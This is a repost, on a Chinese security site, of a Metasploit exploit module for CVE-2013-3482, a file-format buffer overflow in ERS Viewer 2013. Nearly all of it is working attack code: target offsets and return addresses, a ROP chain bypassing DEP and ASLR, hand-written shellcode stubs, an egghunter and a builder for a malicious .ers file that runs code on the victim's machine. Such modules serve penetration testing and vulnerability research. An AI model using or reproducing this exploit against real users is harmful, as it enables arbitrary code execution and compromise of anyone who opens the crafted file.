首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ERS Viewer 2013 ERS File Handling Buffer Overflow
来源:metasploit.com 作者:vazquez 发布时间:2013-07-10  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Remote::Egghunter

	def initialize(info={})
		super(update_info(info,
			'Name'           => "ERS Viewer 2013 ERS File Handling Buffer Overflow",
			'Description'    => %q{
					This module exploits a buffer overflow vulnerability found in ERS Viewer 2013.
				The vulnerability exists in the module ermapper_u.dll, where the function
				rf_report_error handles user provided data in a insecure way. It results in
				arbitrary code execution under the context of the user viewing a specially crafted
				.ers file. This module has been tested successfully with ERS Viewer 2013 (versions
				13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'James Fitts', # Vulnerability Discovery
					'juan vazquez' # Metasploit
				],
			'References'     =>
				[
					[ 'CVE', '2013-3482' ],
					[ 'OSVDB', '93650' ],
					[ 'URL', 'http://secunia.com/advisories/53620/' ]
				],
			'Payload'        =>
				{
					'Space'    => 4000,
					'DisableNops' => true,
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "process",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Tested on Windows XP SP3
					[ 'ERS Viewer 2013 13.0.0.1151 / NO DEP / NO ASLR',
						{
							'Offset' => 191,
							'Ret' => 0x100329E9 # jmp eax # from ermapper_u.dll
						}
					],
					# Tested on Windows XP SP3 and Windows 7 SP1
					[ 'ERS Viewer 2013 13.0.0.1151 / DEP & ASLR bypass',
						{
							'Offset' => 191,
							'Ret' => 0x100E1152,     # xchg eax, esp # ret # from ermapper_u.dll
							'RetNull' => 0x30d07f00, # ret ending with null byte # from ethrlib.dll
							'VirtualAllocPtr' => 0x1010c0f4
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => "May 23 2013",
			'DefaultTarget'  => 1))

		register_options(
			[
				OptString.new('FILENAME', [ true, 'The file name.',  'msf.ers']),
			], self.class)

	end

	def create_rop_chain()
		# rop chain generated with mona.py - www.corelan.be
		rop_gadgets =
			[
				0x10082624,    # POP EAX # RETN [ermapper_u.dll]
				0x1010c0f4,    # ptr to &VirtualAlloc() [IAT ermapper_u.dll]
				0x1001a9c0,    # MOV EAX,DWORD PTR DS:[EAX] # RETN [ermapper_u.dll]
				0x1005db36,    # XCHG EAX,ESI # RETN [ermapper_u.dll]
				0x10105d87,    # POP EBX # RETN [ermapper_u.dll]
				0xffffffff,    #
				0x30d059d9,    # INC EBX # RETN [ethrlib.dll]
				0x30d059d9,    # INC EBX # RETN [ethrlib.dll]
				0x100e9dd9,    # POP EAX # RETN [ermapper_u.dll]
				0xa2dbcf75,    # put delta into eax (-> put 0x00001000 into edx)
				0x1001aa04,    # ADD EAX,5D24408B # RETN [ermapper_u.dll]
				0x10016a98,    # XCHG EAX,EDX # OR EAX,4C48300 # POP EDI # POP EBP # RETN [ermapper_u.dll]
				0x10086d21,    # RETN (ROP NOP) [ermapper_u.dll]
				0x1001a148,    # & push esp # ret  [ermapper_u.dll]
				0x10082624,    # POP EAX # RETN [ermapper_u.dll]
				0xffffffc0,    # Value to negate, will become 0x00000040
				0x100f687d,    # NEG EAX # RETN [ermapper_u.dll]
				0x1001e720,    # XCHG EAX,ECX # ADC EAX,5DE58B10 # RETN [ermapper_u.dll]
				0x100288b5,    # POP EAX # RETN [ermapper_u.dll]
				0x90909090,    # nop
				0x100e69e0,    # PUSHAD # RETN [ermapper_u.dll]
			].flatten.pack("V*")

		return rop_gadgets
	end

	# Restore the stack pointer in order to execute the final payload successfully
	def fix_stack
		pivot = "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18] # get teb
		pivot << "\x83\xC0\x08"             # add eax, byte 8 # get pointer to stacklimit
		pivot << "\x8b\x20"                 # mov esp, [eax] # put esp at stacklimit
		pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
		return pivot
	end

	# In the Windows 7 case, in order to bypass ASLR/DEP successfully, after finding
	# the payload on memory we can't jump there directly, but allocate executable memory
	# and jump there. Badchars: "\x0a\x0d\x00"
	def hunter_suffix(payload_length)
		# push flProtect (0x40)
		suffix = "\xB8\xC0\xFF\xFF\xFF"                              # mov eax, 0xffffffc0
		suffix << "\xF7\xD8"                                         # neg eax
		suffix << "\x50"                                             # push eax
		# push flAllocationType (0x3000)
		suffix << "\x66\x05\xC0\x2F"                                 # add ax, 0x2fc0
		suffix << "\x50"                                             # push eax
		# push dwSize (0x1000)
		suffix << "\x66\x2D\xFF\x1F"                                 # sub ax, 0x1fff
		suffix << "\x48"                                             # dec eax
		suffix << "\x50"                                             # push eax
		# push lpAddress
		suffix << "\xB8\x0C\x0C\x0C\x0C"                             # mov eax, 0x0c0c0c0c
		suffix << "\x50" # push eax
		# Call VirtualAlloc
		suffix << "\xFF\x15" + [target['VirtualAllocPtr']].pack("V") # call ds:VirtualAlloc
		# Copy payload (edi) to Allocated memory (eax)
		suffix << "\x89\xFE"                                         # mov esi, edi
		suffix << "\x89\xC7"                                         # mov edi, eax
		suffix << "\x31\xC9"                                         # xor ecx, ecx
		suffix << "\x66\x81\xC1" + [payload_length].pack("v")        # add cx, payload_length
		suffix << "\xF3\xA4"                                         # rep movsb
		# Jmp to the final payload (eax)
		suffix << "\xFF\xE0"                                         # jmp eax

		return suffix
	end

	def exploit

		#These badchars do not apply to the final payload
		badchars = [0x0c, 0x0d, 0x0a].pack("C*")

		eggoptions =
			{
				:checksum => true,
				:eggtag => 'w00t'
			}
		my_payload = fix_stack + payload.encoded

		if target.name =~ /DEP & ASLR bypass/
			# The payload length can't include NULL's in order to
			# build the stub which will copy the final payload to
			# executable memory
			while [my_payload.length].pack("v").include?("\x00")
				my_payload << rand_text(1)
			end
		end

		hunter,egg = generate_egghunter(my_payload, badchars, eggoptions)

		if target.name =~ /DEP & ASLR bypass/
			hunter.gsub!(/\xff\xe7/, hunter_suffix(my_payload.length))
		end

		if target.name =~ /NO DEP/
			buf = rand_text_alpha(1)
			buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected
			buf << "AA" # EAX pointing to buf[5] prefixed with 0x00 after ret
			buf << hunter
			buf << rand_text_alpha(target['Offset'] - buf.length)
			buf << [target.ret].pack("V") # jmp eax
			buf << rand_text_alpha(8)
			buf << egg
		elsif target.name =~ /DEP & ASLR bypass/
			buf = rand_text_alpha(1)
			buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected
			buf << [target['RetNull']].pack("V")[1,3] # EAX pointing to buf[5] prefixed with 0x00 after ret
			buf << create_rop_chain
			buf << hunter
			buf << rand_text_alpha(target['Offset'] - buf.length)
			buf << [target.ret].pack("V") # xchg eax, esp # ret
			buf << rand_text_alpha(8)
			buf << egg
		end

		ers = %Q|
DatasetHeader Begin
#{buf} End
		|

		file_create(ers)
	end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Solaris Recommended Patch Clus
·SikaBoom Remote Buffer overflo
·Google Chrome 25.0.1364.152 HT
·Apache CXF prior to 2.5.10, 2.
·AOL Instant Messenger 8.0.1.5
·Jolix Media Player 1.1.0 (.m3u
·OpenNetAdmin 13.03.01 Remote C
·nginx 1.3.9/1.4.0 x86 Brute Fo
·Adobe Reader X 10.1.4.38 - BMP
·Ultra Mini HTTPD 1.21 - Stack
·InstantCMS 1.6 Remote PHP Code
·Tri-PLC Nano-10 r81 - Denial o
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved